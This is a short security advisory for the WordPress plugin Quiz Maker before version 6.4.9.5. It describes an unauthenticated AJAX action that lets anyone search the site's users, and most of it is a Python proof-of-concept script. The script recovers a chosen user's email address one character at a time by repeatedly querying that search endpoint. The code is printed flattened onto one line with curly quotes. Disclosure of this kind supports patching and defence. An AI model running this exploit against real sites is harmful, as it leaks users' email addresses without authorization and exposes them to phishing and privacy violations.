Quiz Maker < 6.4.9.5 - Unauthenticated Email Address Disclosure

Description The plugin does not adequately authorize the ays_quiz_author_user_search AJAX action, allowing an unauthenticated attacker to perform a search for users of the system, ultimately leaking user email addresses.

PoC

import string import requests base_url = ‘http://127.0.0.1:8001/wp-admin/admin-ajax.php?action=ays_quiz_author_user_search&amp;search;=’ id_to_find = 1 letter_candidates = string.ascii_lowercase + string.digits + ‘-_.’ email = ‘@’ # Find letters after @ while True: print(“current email”, email) for letter in letter_candidates: query = email + letter data = requests.get(base_url + query).json() if id_to_find in [item[‘id’] for item in data[‘results’]]: email = query break else: break # Find letters before @ while True: print(“current email”, email) for letter in letter_candidates: query = letter + email data = requests.get(base_url + query).json() if id_to_find in [item[‘id’] for item in data[‘results’]]: email = query break else: break